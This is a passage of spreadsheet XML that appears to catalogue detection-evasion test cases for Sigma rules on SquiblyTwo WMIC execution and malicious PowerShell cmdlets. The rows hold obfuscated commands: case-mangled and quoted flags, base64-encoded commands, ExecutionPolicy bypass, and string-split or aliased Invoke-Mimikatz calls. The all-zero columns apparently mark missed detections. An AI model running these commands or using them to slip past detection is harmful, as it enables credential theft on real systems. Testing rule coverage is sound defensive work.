        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E983" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /node:localhost process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I983" s="43" t="n"/>
      <c r="J983" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K983" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="984" ht="15.75" customHeight="1" s="42">
      <c r="A984" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B984" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C984" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D984" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E984" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe -"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I984" s="43" t="n"/>
      <c r="J984" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K984" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="985" ht="15.75" customHeight="1" s="42">
      <c r="A985" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B985" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C985" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D985" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E985" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I985" s="43" t="n"/>
      <c r="J985" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K985" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="986" ht="15.75" customHeight="1" s="42">
      <c r="A986" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B986" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C986" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D986" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E986" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /noDe:LOCALhosT process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I986" s="43" t="n"/>
      <c r="J986" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K986" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="987" ht="15.75" customHeight="1" s="42">
      <c r="A987" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B987" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C987" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D987" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E987" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I987" s="44" t="n"/>
      <c r="J987" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K987" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="988" ht="15.75" customHeight="1" s="42">
      <c r="A988" s="43" t="n"/>
      <c r="B988" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C988" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D988" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E988" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I988" s="44" t="n"/>
      <c r="J988" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K988" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="989" ht="15.75" customHeight="1" s="42">
      <c r="A989" s="43" t="n"/>
      <c r="B989" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C989" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D989" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E989" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I989" s="44" t="n"/>
      <c r="J989" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K989" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="990" ht="15.75" customHeight="1" s="42">
      <c r="A990" s="43" t="n"/>
      <c r="B990" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C990" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D990" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E990" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I990" s="43" t="n"/>
      <c r="J990" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K990" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="991" ht="15.75" customHeight="1" s="42">
      <c r="A991" s="43" t="n"/>
      <c r="B991" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C991" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D991" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E991" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I991" s="44" t="n"/>
      <c r="J991" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K991" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="992" ht="15.75" customHeight="1" s="42">
      <c r="A992" s="43" t="n"/>
      <c r="B992" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C992" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D992" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E992" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I992" s="44" t="n"/>
      <c r="J992" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K992" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="993" ht="15.75" customHeight="1" s="42">
      <c r="A993" s="43" t="n"/>
      <c r="B993" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C993" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D993" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E993" s="44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993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I993" s="44" t="n"/>
      <c r="J993" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K993" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="994" ht="15.75" customHeight="1" s="42">
      <c r="A994" s="43" t="n"/>
      <c r="B994" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C994" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D994" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E994" s="44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994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I994" s="44" t="n"/>
      <c r="J994" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K994" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="995" ht="15.75" customHeight="1" s="42">
      <c r="A995" s="43" t="n"/>
      <c r="B995" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C995" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D995" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E995" s="44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995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I995" s="44" t="n"/>
      <c r="J995" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K995" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="996" ht="15.75" customHeight="1" s="42">
      <c r="A996" s="43" t="n"/>
      <c r="B996" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C996" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D996" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E996" s="44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996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I996" s="43" t="n"/>
      <c r="J996" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K996" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="997" ht="15.75" customHeight="1" s="42">
      <c r="A997" s="43" t="n"/>
      <c r="B997" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C997" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D997" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E997" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F997" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G997" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H997" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I997" s="44" t="n"/>
      <c r="J997" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K997" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="998" ht="15.75" customHeight="1" s="42">
      <c r="A998" s="43" t="n"/>
      <c r="B998" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C998" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D998" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E998" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F998" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G998" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H998" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I998" s="44" t="n"/>
      <c r="J998" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K998" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="999" ht="15.75" customHeight="1" s="42">
      <c r="A999" s="43" t="n"/>
      <c r="B999" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C999" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D999" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E999" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F999" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G999" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H999" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I999" s="44" t="n"/>
      <c r="J999" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K999" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1000" ht="15.75" customHeight="1" s="42">
      <c r="A1000" s="43" t="n"/>
      <c r="B1000" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1000" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1000" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1000" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F1000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1000" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1000" s="43" t="n"/>
      <c r="J1000" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1000" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1001" ht="15.75" customHeight="1" s="42">
      <c r="A1001" s="43" t="n"/>
      <c r="B1001" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1001" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1001" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1001" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1001" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1001" s="43" t="n"/>
      <c r="J1001" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1001" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1002" ht="15.75" customHeight="1" s="42">
      <c r="A1002" s="43" t="n"/>
      <c r="B1002" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1002" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1002" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1002" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1002" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1002" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1002" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1002" s="44" t="n"/>
      <c r="J1002" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1002" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1003" ht="15.75" customHeight="1" s="42">
      <c r="A1003" s="43" t="n"/>
      <c r="B1003" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1003" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1003" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1003" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1003" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1003" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1003" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1003" s="43" t="n"/>
      <c r="J1003" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1003" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1004" ht="15.75" customHeight="1" s="42">
      <c r="A1004" s="44" t="n"/>
      <c r="B1004" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1004" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1004" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1004" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1004" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1004" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1004" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1004" s="44" t="n"/>
      <c r="J1004" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1004" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1005" ht="15.75" customHeight="1" s="42">
      <c r="A1005" s="44" t="n"/>
      <c r="B1005" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1005" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1005" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1005" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1005" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1005" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1005" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1005" s="44" t="n"/>
      <c r="J1005" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1005" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1006" ht="15.75" customHeight="1" s="42">
      <c r="A1006" s="44" t="n"/>
      <c r="B1006" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1006" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1006" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1006" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F1006" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1006" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1006" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1006" s="43" t="n"/>
      <c r="J1006" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1006" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1007" ht="15.75" customHeight="1" s="42">
      <c r="A1007" s="44" t="n"/>
      <c r="B1007" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1007" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1007" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1007" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F1007" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1007" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1007" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1007" s="44" t="n"/>
      <c r="J1007" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1007" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1008" ht="15.75" customHeight="1" s="42">
      <c r="A1008" s="44" t="n"/>
      <c r="B1008" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1008" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1008" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1008" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F1008" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1008" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1008" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1008" s="44" t="n"/>
      <c r="J1008" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1008" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1009" ht="15.75" customHeight="1" s="42">
      <c r="A1009" s="44" t="n"/>
      <c r="B1009" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1009" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1009" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1009" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F1009" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1009" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1009" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1009" s="44" t="n"/>
      <c r="J1009" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1009" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1010" ht="15.75" customHeight="1" s="42">
      <c r="A1010" s="44" t="n"/>
      <c r="B1010" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1010" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1010" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1010" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1010" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1010" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1010" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1010" s="43" t="n"/>
      <c r="J1010" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1010" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1011" ht="15.75" customHeight="1" s="42">
      <c r="A1011" s="44" t="n"/>
      <c r="B1011" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1011" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1011" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1011" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1011" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1011" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1011" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1011" s="44" t="n"/>
      <c r="J1011" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1011" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1012" ht="15.75" customHeight="1" s="42">
      <c r="A1012" s="44" t="n"/>
      <c r="B1012" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1012" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1012" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1012" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1012" s="44" t="b">
        <v>0</v>
      </c>
